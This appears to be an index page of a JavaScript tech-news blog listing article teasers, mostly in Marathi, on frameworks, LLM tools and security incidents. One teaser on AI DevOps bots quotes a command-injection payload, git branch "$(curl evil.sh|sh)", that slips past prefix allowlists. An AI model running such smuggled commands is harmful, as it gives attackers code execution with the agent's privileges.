GyaanSetu JavaScript

The JavaScript and TypeScript ecosystem.

100 articlesDeep, practical knowledge

Node 22’s Promise.withResolvers Cuts Claude Tool Loops in Half

By replacing the bulky `new Promise` pattern with a single `Promise.withResolvers()` call, developers can hand off resolve/reject functions to any part of the system, eliminating forgotten resolves, double-reject warnings, and deep nesting—especially valuable in serverless Lambda environments.

JavaScript · 4 min read

TLS फिंगरप्रिंटिंगमुळे Playwright स्क्रॅपर्सचा क्लाउड कॉम्प्युट वाया जातो आणि खर्च वाढतो

सर्व्हर्स मूळ TLS ClientHello ला JA3/JA4 फिंगरप्रिंटमध्ये हॅश करतात; जर वापरलेला User-Agent किंवा HTTP/2 सेटिंग्ज आणि फिंगरप्रिंटमध्ये काही तफावत आढळली, तर ती विनंती (request) स्क्रिप्टेड असल्याचे मानले जाते. यासाठी एकमेव खात्रीशीर उपाय म्हणजे विनंतीच्या प्रत्येक स्तरावर (layer) एकाच ब्राउझरची माहिती असणे.

JavaScript · 4 min read

VIDRAFT चे Pocket-35B कोणत्याही लॅपटॉप CPU वर चालते, १० लाख डाउनलोड्सचा टप्पा गाठला

Pocket-35B चे GGUF-फॉर्मेटेड वेट्स थेट llama.cpp किंवा Ollama मध्ये लोड होतात, ज्यामुळे GPU बजेट नसलेल्या टीम्सना आवश्यक किमान RAM असल्यास, सामान्य लॅपटॉपवर ३५-बिलियन-पॅरामीटर मॉडेल चालवणे शक्य होते.

JavaScript · 3 min read

कास्टिंग करताना तुमचे कस्टम HTML5 प्लेयर का क्रॅश होतात – ४ छुपे सापळे

कास्टिंग प्लेबॅक टीव्हीच्या फर्मवेअरकडे सोपवते, त्यामुळे टोकन्स सेशनपेक्षा जास्त काळ टिकणे आवश्यक आहे, CORS हेडर्समध्ये टीव्हीचा ओरिजिन समाविष्ट असणे गरजेचे आहे आणि स्ट्रीम URL 'blob' नसावा. हे गाईड मॅनिफेस्ट URL वर कसे स्विच करायचे आणि कनेक्शन कसे व्हॅलिडेट करायचे हे दर्शवते.

JavaScript · 3 min read

JSCeal मालवेअर Chrome OAuth टोकन्स चोरते, क्रिप्टो ट्रेडर्ससाठी Google MFA निष्प्रभ करते

केवळ RAM मध्ये कार्यरत असणारा JSCeal पेलोड Chromium ब्राउझरमधून कुकीज, सेव्ह केलेले पासवर्ड आणि OAuth टोकन्स काढतो आणि त्यानंतर Google च्या सेकंड-फॅक्टर प्रॉम्प्टला बायपास करण्यासाठी सेशन्सचा पुन्हा वापर (replay) करतो, ज्यामुळे हल्लेखोर Binance, Bybit, Ledger आणि इतर प्लॅटफॉर्मवरून निधी चोरू शकतात.

JavaScript · 2 min read

४८ सेकंदात १३ बनावट Coinbase Wallet SDKs ने npm रजिस्ट्री भरून काढली

७ सप्टेंबर २०२६ रोजी UTC वेळ ०४:५४:५९ आणि ०४:५५:४८ च्या दरम्यान प्रकाशित केलेले हे पॅकेजेस, cb-wallet-http सारख्या नावांसह @coinbase/wallet-sdk ची नक्कल करत होते आणि त्यांनी ०.०.१-security व्हर्जन वापरले होते, ज्यामुळे घातक कोड प्रकल्पांमध्ये किती वेगाने शिरकाव करू शकतो हे स्पष्ट होते.

JavaScript · 2 min read

ClickFix Tampermonkey च्या माध्यमातून थेट ब्राउझरद्वारे क्रिप्टो डिपॉझिट्स हायजॅक करत आहे

Cisco Talos ने ClickFix चा शोध लावला आहे, ही एक क्रिप्टो-स्किमिंग योजना आहे जी वापरकर्त्यांना Tampermonkey स्क्रिप्ट इंस्टॉल करण्यास फसवते. ही स्क्रिप्ट रिअल-टाइममध्ये डिपॉझिट पत्ते बदलून टाकते, ज्यामुळे व्यवहार वैध वाटत असतानाच निधी चोरला जातो.

JavaScript · 2 min read

npm, Cargo, Composer आणि pip मध्ये १३ पैकी केवळ २ Semver रेंज सारख्याच प्रकारे काम करतात

१९ व्हर्जन नंबर विरुद्ध १३ रेंज एक्सप्रेशन्सची चाचणी घेतल्यावर केवळ १७ जुळणारे परिणाम समोर आले, ज्यापैकी बहुतेक रिजेक्शन होते. Caret, tilde आणि dot-x चिन्हांचा अर्थ प्रत्येक मॅनेजरद्वारे वेगवेगळ्या प्रकारे लावला जातो, ज्यामुळे आश्चर्यकारक विसंगती निर्माण होतात.

JavaScript · 2 min read

AI-चालित DevOps बॉट्सचा पर्दाफाश: प्रीफिक्स व्हाईटलिस्टमुळे हल्लेखोर कोणताही कोड रन करू शकतात

CVE-2026-22708 हे दर्शवते की, कमांडचा फक्त पहिला टोकन तपासणारे एजंट्स आर्गुमेंट्समध्ये लपवलेल्या पेलोड्सद्वारे (उदा. git branch "$(curl evil.sh|sh)") फसवले जाऊ शकतात, ज्यामुळे हल्लेखोरांना ऑटोमेशन बॉटप्रमाणेच समान अधिकार प्राप्त होतात.

JavaScript · 4 min read

Anthropic ने रिपिटिटिव्ह एजंट लूप्ससाठी Claude Fable 5.1 च्या खर्चात 45% कपात केली

ही 45% सवलत तेव्हा लागू होते जेव्हा एकच सिस्टम प्रॉम्प्ट आणि टूल स्कीमा अनेक इटरेशन्समध्ये पुन्हा वापरले जातात, ज्यामुळे Claude Fable 5.1 स्वायत्त कोड रिव्ह्यूअर्स, तिकीट-ट्रायज बॉट्स आणि इतर रिपिटिटिव्ह एजंट पाइपलाइनसाठी विशेषतः आकर्षक ठरते.

JavaScript · 3 min read

WebFPGA केवळ 30 mW मध्ये 4 ms मध्ये TinyML इन्फरन्स देते – कोणताही डेटा ब्राउझरच्या बाहेर जात नाही

WebFPGA JavaScript मधून Lattice iCE40-UP5K FPGA प्रोग्राम करण्यासाठी WebUSB API वापरते, ज्यामुळे केवळ काही मिलीवॅट वीज वापरून आणि सर्व डेटा डिव्हाइसवरच ठेवून 10 ms पेक्षा कमी वेळेत TinyML इन्फरन्स करणे शक्य होते.

JavaScript · 2 min read

लीक झालेल्या स्ट्राइप कीजमुळे ६६९ विक्रेत्यांकडे फसव्या व्यवहारांना आणि ग्राहकांच्या डेटाच्या चोरीला वाव

या उघड झालेल्या कीजमुळे हल्लेखोर चार्जेस तयार करू शकतात, इनव्हॉइस काढू शकतात आणि वैयक्तिक डेटा गोळा करू शकतात, ज्यामुळे चार्जबॅक, दंड आणि ब्रँडच्या प्रतिष्ठेला धोका निर्माण झाला आहे. तातडीच्या उपाययोजनांमध्ये डॉटफाइल्स ब्लॉक करणे, प्रत्येक की रोटेट करणे आणि सिक्रेट्स व्हॉल्टमध्ये हलवणे यांचा समावेश आहे.

JavaScript · 4 min read

LibreOffice 26.8 ने गोपनीयता-प्रथम रोडमॅप सादर केला, AI क्लाउड कॉल्सना बगल दिली

नवीन आवृत्ती जटिल लिपींसाठी परिच्छेद मांडणी अधिक अचूक करते, एक साधे 'ड्राफ्ट व्ह्यू' समाविष्ट करते आणि ODF-DOCX/XLSX रूपांतरण सुधारते; तसेच, सुरक्षा पॅचेस आणि मॅक्रो सँडबॉक्सिंगमुळे कागदपत्रे ऑन-प्रिमाइसेस सुरक्षित राहतात.

JavaScript · 2 min read

नवीन Rust Binary मुळे TypeScript 7 ने Type-Checking मधील विलंब 40% ने कमी केला आहे

Rust मध्ये लिहिलेले हे इंजिन एका स्वतंत्र प्रोसेसमध्ये चालते, ज्यामुळे type analysis आणि UI thread एकमेकांपासून वेगळे होतात. तसेच, यामध्ये अधिक स्मार्ट कॅशिंगचा वापर केला आहे जो फक्त बदललेल्या फाइल्स पुन्हा तपासतो, ज्यामुळे incremental builds अधिक वेगवान होतात.

JavaScript · 2 min read

Vue 3.6 चा Vapor Mode Virtual DOM चा वापर टाळून गेमची कामगिरी सुधारतो

Vue 3.6 चा आगामी Vapor Mode सिंगल-फाईल कंपोनंट्सना थेट DOM कॉल्समध्ये कंपाईल करतो, ज्यामुळे virtual-DOM diff स्टेपची गरज उरत नाही. प्रति सेकंद अनेकदा रिपेंट (repaint) होणाऱ्या बेंचमार्क गेम्समध्ये, हा बदल रेंडरिंग वेळ कमी करतो आणि बंडलचा आकार लहान करतो, जरी कमी-फ्रिक्वेन्सी असलेल्या UIs मध्ये याचा फारसा फायदा दिसत नसला तरी.

JavaScript · 4 min read

११ दिवसांत Bun ला Rust मध्ये पुन्हा लिहिण्यासाठी Anthropic ने Claude टोकन्सवर $१६५K खर्च केले

Anthropic च्या अभियंत्यांनी ११ दिवसांत Bun चा कोडबेस Rust मध्ये पुन्हा लिहिण्यासाठी ६४ समांतर Claude Fable 5 एजंट्सचा वापर केला, ज्यामध्ये $१६५K इतका टोकन वापर नोंदवला गेला; मात्र, मर्ज नंतरचे कम्प्युट आणि सुरक्षा ऑडिट्स विचारात घेतल्यास खरा खर्च त्यापेक्षा अधिक असण्याची शक्यता आहे.

JavaScript · 3 min read

Claude ने चार एजंट टूल्स GA मध्ये आणले, एंटरप्राइजेससाठी बीटा हेडर्सची अडचण दूर केली

केवळ बीटासाठी असलेले रिक्वेस्ट हेडर्स निघून गेल्यामुळे, एंटरप्राइजेस आता कायदेशीर आणि सुरक्षाविषयक अडथळे दूर करू शकतात. कॉम्प्युटर-युज टूलसाठीचा नवीन बॅच-ॲक्शन मोड कमी लॅटन्सी आणि टोकन वापराचे आश्वासन देतो, तरीही या बचतीची पडताळणी करणे आवश्यक आहे.

JavaScript · 3 min read

Next.js 16.3 मुळे Turbopack स्थिर झाले असून मध्यम आकाराच्या ॲप्ससाठी बिल्ड वेळ २-५ पटीने कमी झाली आहे

या रिलीजमध्ये प्रोडक्शन-रेडी 'Partial Prerendering' देखील आले आहे, जे 'Time to Interactive' मध्ये ४०-६०% बचत करू शकते. तसेच, यामध्ये Server Actions साठी अधिक सक्षम TypeScript सपोर्ट आणि Rust-आधारित middleware देण्यात आले आहे, परंतु यासाठी Node 20+ आवश्यक असून यामुळे सध्याचे Webpack प्लगइन्स खंडित होण्याची शक्यता आहे.

JavaScript · 3 min read

TanStack Table v9 ने ऑप्ट-इन फीचर्समुळे बंडल आकार ~५ KB पर्यंत कमी केला

नवीन बीटा आवृत्तीमुळे तुम्ही फक्त आवश्यक ग्रिड क्षमता इम्पोर्ट करू शकता—सॉर्टिंग कोड पूर्णपणे वगळून, डाउनलोड आकार सुमारे ५ KB पर्यंत कमी करता येईल आणि मुख्य-थ्रेडवरील (main-thread) काम टाळता येईल, ज्यामुळे पूर्वी INP स्कोअर कमी होत होते.

JavaScript · 2 min read